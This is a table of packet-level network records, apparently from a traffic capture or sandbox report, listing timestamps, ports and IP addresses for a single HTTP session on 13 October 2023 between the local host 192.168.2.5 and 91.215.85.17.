Oct 13, 2023 15:20:54.912559032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.912632942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912700891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912739992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912750006 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.912775993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912833929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.912843943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912880898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.912931919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.912949085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913121939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913157940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913177967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.913218975 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913270950 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.913290977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913327932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913376093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.913420916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913459063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913507938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.913598061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913667917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913726091 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.913772106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913810968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913856030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.913880110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913949966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.913996935 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.914035082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914103985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914139986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914155960 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.914266109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914316893 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.914344072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914412022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914474964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914479017 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.914511919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914547920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914561033 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.914618015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914665937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.914686918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914755106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914819002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.914933920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.914969921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915007114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915015936 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.915045023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915081024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915093899 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.915148973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915195942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.915287018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915323973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915359974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915369987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.915400982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915441036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915451050 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.915539980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915575981 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915599108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.915723085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915760994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915771008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.915852070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915888071 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915904045 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.915925980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.915971041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.915994883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916063070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916101933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916156054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.916176081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916212082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916228056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.916311026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916347027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916367054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.916448116 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916497946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.916532040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916600943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916661024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.916678905 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916790962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916830063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916848898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.916866064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916920900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.916956902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.916996956 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917042971 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.917062998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917279959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917316914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917336941 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.917395115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917448997 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.917509079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917578936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917630911 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.917650938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917690039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917745113 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.917762041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917798042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917846918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.917865038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917901993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.917954922 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.917969942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918009996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918060064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.918127060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918167114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918219090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.918234110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918273926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918328047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.918479919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918675900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918730974 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.918747902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918817043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.918874025 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.918932915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919054985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919092894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919131041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.919188023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919224024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919239044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.919294119 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919351101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.919408083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919511080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919569016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.919611931 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919648886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919709921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.919758081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919923067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.919975996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.920576096 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.920686007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.920727015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.920759916 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.920816898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.920855045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.920869112 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.920924902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.920979977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.920995951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921169996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921232939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.921266079 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921386003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921426058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921428919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.921509981 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921559095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.921596050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921680927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921698093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921727896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.921763897 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921812057 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.921821117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921870947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921915054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.921915054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.921993017 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922040939 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.922080040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922143936 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922185898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.922194958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922286987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922305107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922333956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.922482967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922533989 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.922543049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922579050 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922621965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.922645092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922826052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922864914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922873020 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.922907114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.922950983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.923047066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923163891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923213959 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.923252106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923345089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923391104 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.923505068 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923623085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923666000 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.923696041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923752069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923779011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923796892 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.923835039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923885107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.923918962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.923970938 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924016953 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.924032927 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924097061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924138069 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.924236059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924329996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924380064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.924411058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924495935 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924544096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.924586058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924695015 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924738884 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.924793005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924853086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.924900055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.924931049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925013065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925062895 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.925067902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925152063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925194979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925195932 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.925266027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925311089 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.925323009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925365925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925420046 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.925442934 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925544977 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925589085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.925601959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925662041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925708055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.925712109 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925781012 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925826073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.925837040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925894976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.925941944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.925956011 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926161051 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926208019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.926278114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926321030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926364899 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.926402092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926513910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926558018 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.926583052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926645994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926690102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.926717997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926768064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926811934 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.926812887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926882029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.926924944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.926979065 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927010059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927071095 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.927105904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927160978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927203894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.927218914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927275896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927318096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.927345037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927376986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927424908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:54.927464962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927481890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:54.927525043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.264311075 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264375925 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264414072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264451027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264481068 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.264492989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264533043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264553070 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.264569044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264580965 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.264609098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264647007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264662981 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.264683962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264723063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264735937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.264760017 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264796972 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264811039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.264832973 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264869928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.264875889 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.265002966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265039921 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265058994 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.265075922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265126944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.265149117 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265217066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265252113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265265942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.265289068 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265340090 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.265387058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265455008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265506029 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.265582085 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265618086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265669107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.265716076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265784979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265825033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.265841007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.265892982 CEST	80	49721	91.215.85.17	192.168.2.5
